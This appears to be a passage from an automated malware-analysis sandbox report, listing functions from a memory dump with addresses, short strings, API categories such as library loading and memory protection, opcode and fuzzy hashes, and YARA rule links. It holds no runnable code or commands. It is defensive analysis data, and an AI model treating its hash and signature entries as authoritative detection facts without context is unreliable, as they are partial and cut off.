String ID: Du#$b
API String ID: 0-3254798933
Opcode ID: bb75e03d5431d8c782254aa692237cad9316af29befe9b94b053e978d4aef46e
Instruction ID: 0b0ea59c42e66059dde1971870dda7790c91c030b241474057d5dcea81d51a3f
Opcode Fuzzy Hash: bb75e03d5431d8c782254aa692237cad9316af29befe9b94b053e978d4aef46e
Instruction Fuzzy Hash: D781E27168434ACFDB719E74CDA47EE37A6AF52390F85402ECD8A9B510E3328981DB12

Uniqueness

Uniqueness Score: -1.00%

Function 020B2B37, Relevance: 2.7, Strings: 2, Instructions: 213COMMON

Download Yara Rule

Strings

b^-j, xrefs: 020B2BAB
QVyy, xrefs: 020B2C8D

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: QVyy$b^-j
API String ID: 0-196416884
Opcode ID: 3615858e993729d99e8fe32ac8c1f1d6488f2fde898d25094993fe9167e3d597
Instruction ID: 3e3d7cb61f335a90604e805085e6d6423773e69212d6ab442772990222e6119a
Opcode Fuzzy Hash: 3615858e993729d99e8fe32ac8c1f1d6488f2fde898d25094993fe9167e3d597
Instruction Fuzzy Hash: 7571257060830A8FDB35AE24C9957EB7BE2FF66390F81452DDCCAD7145D3344A85DA02

Uniqueness

Uniqueness Score: -1.00%

Function 020B6363, Relevance: 2.7, Strings: 2, Instructions: 200COMMON

Download Yara Rule

Strings

Du#, xrefs: 020B6625
b, xrefs: 020B64CA

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: Du#$b
API String ID: 0-3254798933
Opcode ID: e3043a41024bc945f5877f36611d13c9ab5e0af6339d5fab44a8b7f8ab1a3792
Instruction ID: 29a2ff48af13d68d311ff2aeb3a1edb1d1dd8f7d33818902ff16afdb8ae3665e
Opcode Fuzzy Hash: e3043a41024bc945f5877f36611d13c9ab5e0af6339d5fab44a8b7f8ab1a3792
Instruction Fuzzy Hash: 3971047168434ACFDF729E74CDA47EE37E6AF52390F85442ACD8A9B500E3318984DB12

Uniqueness

Uniqueness Score: -1.00%

Function 020B2B83, Relevance: 2.7, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

b^-j, xrefs: 020B2BAB
QVyy, xrefs: 020B2C8D

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: QVyy$b^-j
API String ID: 0-196416884
Opcode ID: afb3c77edf284430a393ebf31271a88b390c255d5dfdd4f0087de8907cd2cc68
Instruction ID: 6ac694a2c51edb1588e40fc1a331633cde0ccb7c8b8e361527c98ab0dec3e66c
Opcode Fuzzy Hash: afb3c77edf284430a393ebf31271a88b390c255d5dfdd4f0087de8907cd2cc68
Instruction Fuzzy Hash: AC61147460834A8FDF31AE28C9957DA77A2EF56390F80452DDCCAD7245D3348A85DB02

Uniqueness

Uniqueness Score: -1.00%

Function 020B63AC, Relevance: 2.7, Strings: 2, Instructions: 185COMMON

Download Yara Rule

Strings

Du#, xrefs: 020B6625
b, xrefs: 020B64CA

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: Du#$b
API String ID: 0-3254798933
Opcode ID: 01e628ef274bf3fd7cbe69afc014b6ddcd9567e6c49e5dc1c52f560965b3f83e
Instruction ID: 4726831f822b89345cc57b3fed8fde2ca59b2747b226c589f4c8d4fc27a2517c
Opcode Fuzzy Hash: 01e628ef274bf3fd7cbe69afc014b6ddcd9567e6c49e5dc1c52f560965b3f83e
Instruction Fuzzy Hash: 2C61F17168434ACFDF769E74CEA47EE37A6AF52390F45402ECD869B510E3318980DB12

Uniqueness

Uniqueness Score: -1.00%

Function 020B641B, Relevance: 2.7, Strings: 2, Instructions: 162COMMON

Download Yara Rule

Strings

Du#, xrefs: 020B6625
b, xrefs: 020B64CA

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: Du#$b
API String ID: 0-3254798933
Opcode ID: c3f5e432e4d7c5b28019621af33f32ddd0c3bd9e08051b9beb4b86bcf8c9e1f9
Instruction ID: 5a88209754d58902fef0468169b5201d751b17a6e3dc0ed1b11778c74dc7c9b0
Opcode Fuzzy Hash: c3f5e432e4d7c5b28019621af33f32ddd0c3bd9e08051b9beb4b86bcf8c9e1f9
Instruction Fuzzy Hash: D251D07168834ACFDF769E74CD947EE77A6AF51390F44452ECD8A9B610E3328980DB02

Uniqueness

Uniqueness Score: -1.00%

Function 020B6480, Relevance: 2.6, Strings: 2, Instructions: 140COMMON

Download Yara Rule

Strings

Du#, xrefs: 020B6625
b, xrefs: 020B64CA

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: Du#$b
API String ID: 0-3254798933
Opcode ID: ea502e7787b7f4acc908dc5d1303769a05bd56c8c313f57dc5b3f197e02b1223
Instruction ID: 5390265ed2e15d75b9b1a91f74bf3705443be540919321bc97a6a755860700a6
Opcode Fuzzy Hash: ea502e7787b7f4acc908dc5d1303769a05bd56c8c313f57dc5b3f197e02b1223
Instruction Fuzzy Hash: 3351F17068834ACFDF769E74CD947EE37A6AF11350F448429CE8A5B610E3328984EB02

Uniqueness

Uniqueness Score: -1.00%

Function 020B44C0, Relevance: 1.5, Strings: 1, Instructions: 279COMMON

Download Yara Rule

Strings

nA0, xrefs: 020B5503

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: nA0
API String ID: 1029625771-2796399028
Opcode ID: 76128aaddc27de11a47ecd796297226e9c5f3458684a9293c60868648fb2829d
Instruction ID: e9a23526939a86400c350ade0527025d1c6e9cf2abf788bb9a7c0453fa0f40f5
Opcode Fuzzy Hash: 76128aaddc27de11a47ecd796297226e9c5f3458684a9293c60868648fb2829d
Instruction Fuzzy Hash: FDA132B2A4434A8FDF755E24CDA07EEB7A2BFA5310F96402EDD8A97210D7314981DF02

Uniqueness

Uniqueness Score: -1.00%

Function 020B3B60, Relevance: 1.4, Strings: 1, Instructions: 199COMMON

Download Yara Rule

Strings

i~A, xrefs: 020B3BEE

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i~A
API String ID: 0-3363170351
Opcode ID: 7d3986439561cb2adbc0c29c788464832300bddddd9407faa551947f69f9070b
Instruction ID: cf7165c7857c2a2d236bdc1002e210a425ee43096f455571e8a36770619897e6
Opcode Fuzzy Hash: 7d3986439561cb2adbc0c29c788464832300bddddd9407faa551947f69f9070b
Instruction Fuzzy Hash: 9871EF72608304CFEB769F38C848BEAB7A2FF15350F56858DE8868B161D3349981DF12

Uniqueness

Uniqueness Score: -1.00%

Function 020B2BD8, Relevance: 1.4, Strings: 1, Instructions: 189COMMON

Download Yara Rule

Strings

QVyy, xrefs: 020B2C8D

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: QVyy
API String ID: 0-3990941438
Opcode ID: 3875a44b033f263b114c94b35bebb53cf1e7a365440d1cbbfc77e734aa63e0a5
Instruction ID: 7830186614fb6f98d175758855aa4a2016235df67f646d20f5840ca18a3b9d1e
Opcode Fuzzy Hash: 3875a44b033f263b114c94b35bebb53cf1e7a365440d1cbbfc77e734aa63e0a5
Instruction Fuzzy Hash: 4D61363460834A8FDF329E28C8947EE7BE2FF96390F95452D9CCA97245D3344A85DB02

Uniqueness

Uniqueness Score: -1.00%

Function 020B2C33, Relevance: 1.4, Strings: 1, Instructions: 164COMMON

Download Yara Rule

Strings

QVyy, xrefs: 020B2C8D

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: QVyy
API String ID: 0-3990941438
Opcode ID: 317914a6cb9915105ad2215e239525e62d1a6ead074fd716ce2adb6bdbf416d5
Instruction ID: 7021f1b35ca6fe5e10a061e1e2c477f2ed8dda7e8539dbb8b42109dee88f6758
Opcode Fuzzy Hash: 317914a6cb9915105ad2215e239525e62d1a6ead074fd716ce2adb6bdbf416d5
Instruction Fuzzy Hash: CB51377060834A8FDF329E28C9943DA77E2FF96394F94852D9CC9D7245D3704A85DB12

Uniqueness

Uniqueness Score: -1.00%

Function 020B3B6F, Relevance: 1.4, Strings: 1, Instructions: 145COMMON

Download Yara Rule

Strings

i~A, xrefs: 020B3BEE

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i~A
API String ID: 0-3363170351
Opcode ID: 5936123ee88dcff301463a016621be1d1cca483e007a8ae69a0044b60e1b1afb
Instruction ID: 9c0e58c40a0d914712cd3aec89334d9fde704780bae0dfe1d1551df9ce0fcfbe
Opcode Fuzzy Hash: 5936123ee88dcff301463a016621be1d1cca483e007a8ae69a0044b60e1b1afb
Instruction Fuzzy Hash: DE51DE72508309CFDB76AF74C844BE9B7E2BF15350F96458ED9CA8B125D3309981DB12

Uniqueness

Uniqueness Score: -1.00%

Function 020B3BAF, Relevance: 1.4, Strings: 1, Instructions: 125COMMON

Download Yara Rule

Strings

i~A, xrefs: 020B3BEE

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i~A
API String ID: 0-3363170351
Opcode ID: 3ee2a74eff1d21ddc3055c61097bfe4d7f5be08def0047d0e9a6768df1961be2
Instruction ID: f2da950e62d8b7cac8edd26ca82258334925fe924970e5c1f29d879f53f58fbe
Opcode Fuzzy Hash: 3ee2a74eff1d21ddc3055c61097bfe4d7f5be08def0047d0e9a6768df1961be2
Instruction Fuzzy Hash: 83519B72608305CFDB66AF78C859BE9B7A2FF15350F56444AD9898B221D3309981DF12

Uniqueness

Uniqueness Score: -1.00%

Function 020B64DB, Relevance: 1.4, Strings: 1, Instructions: 122COMMON

Download Yara Rule

Strings

Du#, xrefs: 020B6625

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: Du#
API String ID: 0-1065362229
Opcode ID: 4a721bfa77a0f46c5172c696a2b47ca40f60831bc9f00f235a447d243da13d01
Instruction ID: 46ba23213895cab27942f91819a18ff905767c6bf7f61d4b424914971f7f3994
Opcode Fuzzy Hash: 4a721bfa77a0f46c5172c696a2b47ca40f60831bc9f00f235a447d243da13d01
Instruction Fuzzy Hash: 5441E07168934ACFDF769E74CD94BEE37AAAF11350F444529CE8A9B600E3318680DF12

Uniqueness

Uniqueness Score: -1.00%

Function 020B8C44, Relevance: .5, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
Opcode ID: 03044a4acc83f0d0743762f154fe918dff2ed5aab0d47c539a9da57d79116d03
Instruction ID: dfdd9a56fd9be0245733c0dd5b967f392ba4df71bdeb7b5d6b5bce09f4fe55f7
Opcode Fuzzy Hash: 03044a4acc83f0d0743762f154fe918dff2ed5aab0d47c539a9da57d79116d03
Instruction Fuzzy Hash: A5F1F6619083868EDB738B38C9CC7DABAD25F53260F09C2AACD954F1E7D3758446DB12

Uniqueness

Uniqueness Score: -1.00%

Function 020B2F50, Relevance: .4, Instructions: 426libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 842b8f5f86425a08f0e86957275799d059032b64750653487f52808e61d8cf2f
Instruction ID: 1879993cd304db874a2cce7239f9295f2cf7ff145cc3f5ea8fde5ec11707ef67
Opcode Fuzzy Hash: 842b8f5f86425a08f0e86957275799d059032b64750653487f52808e61d8cf2f
Instruction Fuzzy Hash: 19F1DD71B0474ADFDB39CF28C894BDAB7A2FF59310F688229DC5987201D770A991CB91

Uniqueness

Uniqueness Score: -1.00%

Function 020B2FA8, Relevance: .4, Instructions: 406libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 00f6e8b9de11ad8082e3fd3a1a81d018f3b7eb40dacb9120ddd0983b2e11bdec
Instruction ID: 52274802857906b773bb8605f6f88a4e15dc1e56dec1fd98330a6dc53d0b7fb3
Opcode Fuzzy Hash: 00f6e8b9de11ad8082e3fd3a1a81d018f3b7eb40dacb9120ddd0983b2e11bdec
Instruction Fuzzy Hash: 4DE1BC7170474A9FDB3ACF28C894BDAB7A2FF59310F68822DDC5987201D770A991CB91

Uniqueness

Uniqueness Score: -1.00%

Function 020B3063, Relevance: .4, Instructions: 361libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 2a41589300378590534591ce83f1e440bfbbc832169b378c40965bff32350ebf
Instruction ID: 83df60e851adcd0dd8e107f5353c9d054c6798753d7f3ee48534735a061b685f
Opcode Fuzzy Hash: 2a41589300378590534591ce83f1e440bfbbc832169b378c40965bff32350ebf
Instruction Fuzzy Hash: 4CD1CC71B0474A9FDB3ADF28C890BDAB7A2FF59304F58822DDC5987201D770A951CB91

Uniqueness

Uniqueness Score: -1.00%

Function 020B30C4, Relevance: .3, Instructions: 344libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: bf729b69b806d5ea49fb1958a883ddc2b6311c7b62cdf30329bfa86de620a872
Instruction ID: 49a23aca65b30acd093f30aba7eb310cce6e29dac70b47b8fe6ea0fa4e81e2fa
Opcode Fuzzy Hash: bf729b69b806d5ea49fb1958a883ddc2b6311c7b62cdf30329bfa86de620a872
Instruction Fuzzy Hash: C4D1DF7170474A9FDB7ACF28C894BDAB7A1FF49300F68822DDC4987201D770A991CB91

Uniqueness

Uniqueness Score: -1.00%

Function 020B3114, Relevance: .3, Instructions: 328libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 95deac5edd0438bb0acff21883a24a8bd42ffaa111ade403044d6c156d17f8da
Instruction ID: 99c026c0b0b8f5ade5684a599b67ce7ac90612d729c3801ad08817034602dece
Opcode Fuzzy Hash: 95deac5edd0438bb0acff21883a24a8bd42ffaa111ade403044d6c156d17f8da
Instruction Fuzzy Hash: 1BC1CF7170474A9FDB3ADF28C894BEAB7E2BF49310F598229DC4987201D770A981CB91

Uniqueness

Uniqueness Score: -1.00%

Function 020B317B, Relevance: .3, Instructions: 304libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 2d8bf99917c45af182f59383a6ae1a75af2944ff59a86eeb816d0b4b7d75dd18
Instruction ID: 97e7d810a125d957c6ba28e807064009692923a990ec5b4db88bf909b48f0b53
Opcode Fuzzy Hash: 2d8bf99917c45af182f59383a6ae1a75af2944ff59a86eeb816d0b4b7d75dd18
Instruction Fuzzy Hash: A9B1CE7170434ADFDB3ADF28C894BEAB7E2BF49314F698269DC4987201D770A980DB51

Uniqueness

Uniqueness Score: -1.00%

Function 020B8C6D, Relevance: .3, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 87a30711d6e18c2f5e8095acb594d4b5a695a09a2dc5ecfe6676fdc9e81b3a6d
Instruction ID: eb264a80248a205d612c99ecd38c9896d6d9b2cdb5a969b6b402991f33606634
Opcode Fuzzy Hash: 87a30711d6e18c2f5e8095acb594d4b5a695a09a2dc5ecfe6676fdc9e81b3a6d
Instruction Fuzzy Hash: 85B1C0605083828EDB738B78C88CB96BBD29F13260F09C2EACD954F1E7D3798445DB16

Uniqueness

Uniqueness Score: -1.00%

Function 020B31F4, Relevance: .3, Instructions: 277libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d31a043c33577d4f77a7b3551f19c2fafe29f288842b51cd15f8890ff7c03618
Instruction ID: 35ed6c0f0d6a54c0f1f74378acae2f7258bd4258efeed71798cf91a3ba461ff9
Opcode Fuzzy Hash: d31a043c33577d4f77a7b3551f19c2fafe29f288842b51cd15f8890ff7c03618
Instruction Fuzzy Hash: F7A1E37270474A9FDB3ACF28CC947DAB7E2BF55310F698269DC4987201D770A940DB91

Uniqueness

Uniqueness Score: -1.00%

Function 020B3244, Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2c0645caffb6662a0ac9d8c8387ee4f8b775943d1a99146540b737dc5ab82b6
Instruction ID: e9c85e6310a529bbc6d5102d8fb2292c470eef6f06e8c342ef044ffdb92b9394
Opcode Fuzzy Hash: e2c0645caffb6662a0ac9d8c8387ee4f8b775943d1a99146540b737dc5ab82b6
Instruction Fuzzy Hash: FDA1E07270474ADFDB3ACF28C894BDAB7E2BF55300F688269DC4987201E770A940DB91

Uniqueness

Uniqueness Score: -1.00%

Function 020B8CDA, Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 2223b1bfe0a785349fa2bc808a486971f1c93501e9ef83a4bb1918df12d0f292
Instruction ID: 738eb7af1a9b87b2e5cca57970c65fb9bdd80aee82bb4a58820e528087b282ea
Opcode Fuzzy Hash: 2223b1bfe0a785349fa2bc808a486971f1c93501e9ef83a4bb1918df12d0f292
Instruction Fuzzy Hash: F991C0215083868EDB738B78C88DB96BED25F13264F09C2EACDD54F0E7D3698446D716

Uniqueness

Uniqueness Score: -1.00%

Function 020B3275, Relevance: .2, Instructions: 247libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 0076b4bda204f1df3f6823158cbd82a0d05237ee26968fa5764b78bd191c6c59
Instruction ID: 727b7e2a0d6e950935a61795c5c3b16a6346766b57756fb5a33b9daa7c58bc68
Opcode Fuzzy Hash: 0076b4bda204f1df3f6823158cbd82a0d05237ee26968fa5764b78bd191c6c59
Instruction Fuzzy Hash: 4891CF7270474A9FDB3ACF28C894BDAB7A2BF58310F688269DC5987211D770A940DB91

Uniqueness

Uniqueness Score: -1.00%

Function 020B8D14, Relevance: .2, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 63e2dbbcece2bb002e445f17a6991648923fcbfedbc54b2cc492511192f78dbf
Instruction ID: 0d2e6d9608e4ef2563909030dc94f9018e585175d5d3246658129c54b5e4ebf5
Opcode Fuzzy Hash: 63e2dbbcece2bb002e445f17a6991648923fcbfedbc54b2cc492511192f78dbf
Instruction Fuzzy Hash: 07919F105083C28EEB738B78C89DB96BED25F13264F09C2EACD954F1E7D3698446D716

Uniqueness

Uniqueness Score: -1.00%

Function 020B8D5C, Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fbc33f7189e1c58d77c17feaa84bcd7e648ae09c5eed55057500a36271b3e42
Instruction ID: abead802f9c94bbedc4a232f8e561fc0ef76a725e6a45c0a4a0b4ea6728207a8
Opcode Fuzzy Hash: 7fbc33f7189e1c58d77c17feaa84bcd7e648ae09c5eed55057500a36271b3e42
Instruction Fuzzy Hash: 4F81A1109083868EEB738B78C89D796BED25F13264F0DC2EACD994E0E7D3698446D716

Uniqueness

Uniqueness Score: -1.00%

Function 020B8D7E, Relevance: .2, Instructions: 228COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4553a0644106ad7513717db4a93c77b7e4eef0fc76fb4f421ccad49797065fe2
Instruction ID: babab74a611503d089c4333f09a42dfb94e28351c1e9b4fb14149da018a35f16
Opcode Fuzzy Hash: 4553a0644106ad7513717db4a93c77b7e4eef0fc76fb4f421ccad49797065fe2
Instruction Fuzzy Hash: 7681A1105083828EEB738B38C89DB96BED25F13264F0DC2EACD994F0E7D3698446D716

Uniqueness

Uniqueness Score: -1.00%

Function 020B8547, Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: e371a48542fa8554730c25d438576c1f6ecf3e960d48f7badf9497de6432e15e
Instruction ID: 17f0ffb5aebe6e7934f944804f3a1c71a36dc133c5f98666deacbe00617fe101
Opcode Fuzzy Hash: e371a48542fa8554730c25d438576c1f6ecf3e960d48f7badf9497de6432e15e
Instruction Fuzzy Hash: ED71A071A043099FEF339E6488A43EE73E79F45394F95802FCC4697664D3345581DB46

Uniqueness

Uniqueness Score: -1.00%

Function 020B3774, Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 955aea5f43fcd5bf92adca54e3573f836d2479415029cec04e902e29ac23a258
Instruction ID: c96f77f3ffb97168df80bad1bc80dc7c93ebaab1823dc941d2b292bf3955a725
Opcode Fuzzy Hash: 955aea5f43fcd5bf92adca54e3573f836d2479415029cec04e902e29ac23a258
Instruction Fuzzy Hash: 1771F471B053499FDB368F68C8A4BEA73E2BF4A350F65816DDC898B241DB309944DB41

Uniqueness

Uniqueness Score: -1.00%

Function 020B8DC3, Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbc75c15db5ac36103abdc27a7435252097cbb5994a2bdbdb6c89bee3f03ed07
Instruction ID: 73808a028edecb8601cfb3b40d5f0f9e9af6841bd9de13248ff956a00695ffc0
Opcode Fuzzy Hash: dbc75c15db5ac36103abdc27a7435252097cbb5994a2bdbdb6c89bee3f03ed07
Instruction Fuzzy Hash: A371A2605083828EDB728B38C88DB96BED25F13264F0DC2EACD994E1EBD3758446D716

Uniqueness

Uniqueness Score: -1.00%

Function 020B8DFF, Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00c4009643dcae68ed249672cd56636609ce7bfe3f00c5ae9692009b834df9f7
Instruction ID: ef049d7943e08d7dc45ab66ecbe4a78af99f1cf15d2b6ca8d5caa371e6080fb4
Opcode Fuzzy Hash: 00c4009643dcae68ed249672cd56636609ce7bfe3f00c5ae9692009b834df9f7
Instruction Fuzzy Hash: 9761C3615083828EDB728B38888D796BED25F13274F09C2EACD994F1EBD3758446D717

Uniqueness

Uniqueness Score: -1.00%

Function 020B8E8C, Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd1861ec737031224dbfcc83af2aaae54fba1947d04765361bd3f8ecc9d41b08
Instruction ID: d482e7dd46f9658db578bb6cc674b78dc6fb709eb4fd9d33a9e8ca53bda0b44d
Opcode Fuzzy Hash: fd1861ec737031224dbfcc83af2aaae54fba1947d04765361bd3f8ecc9d41b08
Instruction Fuzzy Hash: 4D5107619043868EDB768E388CC97D6BBD2AF53260F08C2AACC955E1DAD3758446DB12

Uniqueness

Uniqueness Score: -1.00%

Function 020B1F3C, Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1678bfb9bc6aeaf59ffee4e4b4ded1d3dd0ecbe29fcd7465d61cd01be774b5ff
Instruction ID: e077ef6a9ef5b29367fc81a0fc0f9e89d135e070c71f7c5c9b5738de21644cc3
Opcode Fuzzy Hash: 1678bfb9bc6aeaf59ffee4e4b4ded1d3dd0ecbe29fcd7465d61cd01be774b5ff
Instruction Fuzzy Hash: BC512571A403589FCF358E288CA87EF77B6AF88310F55422EEC4E9B251D3314A85DB45

Uniqueness

Uniqueness Score: -1.00%

Function 020B8E4B, Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2d803435a90e2cff36487b96b9f73b27d45eee74a51a9eb86fb2b437087b927
Instruction ID: 09f20900a17c3c0d32b46f9302f0a277a5ee4ad4c1d689401abeb99d05cec5af
Opcode Fuzzy Hash: d2d803435a90e2cff36487b96b9f73b27d45eee74a51a9eb86fb2b437087b927
Instruction Fuzzy Hash: D251E3609083868EDB728F38888D7D6BAD29F13260F09C2AACDD54E1EBD3758446D717

Uniqueness

Uniqueness Score: -1.00%

Function 020B1F52, Relevance: .2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa706a56207fa1c01f7efc8de9a27a0674d8c83744ea2116ba007ea13d569fa7
Instruction ID: e47e91381def8c401a3ee39596b0fd89fa73630c436c31aba7808dfd90305717
Opcode Fuzzy Hash: fa706a56207fa1c01f7efc8de9a27a0674d8c83744ea2116ba007ea13d569fa7
Instruction Fuzzy Hash: 72512471A403589FCF398E288CA87EF76B6AF89350F55422EEC4E9B241D3314E85DB45

Uniqueness

Uniqueness Score: -1.00%

Function 020B1F7F, Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
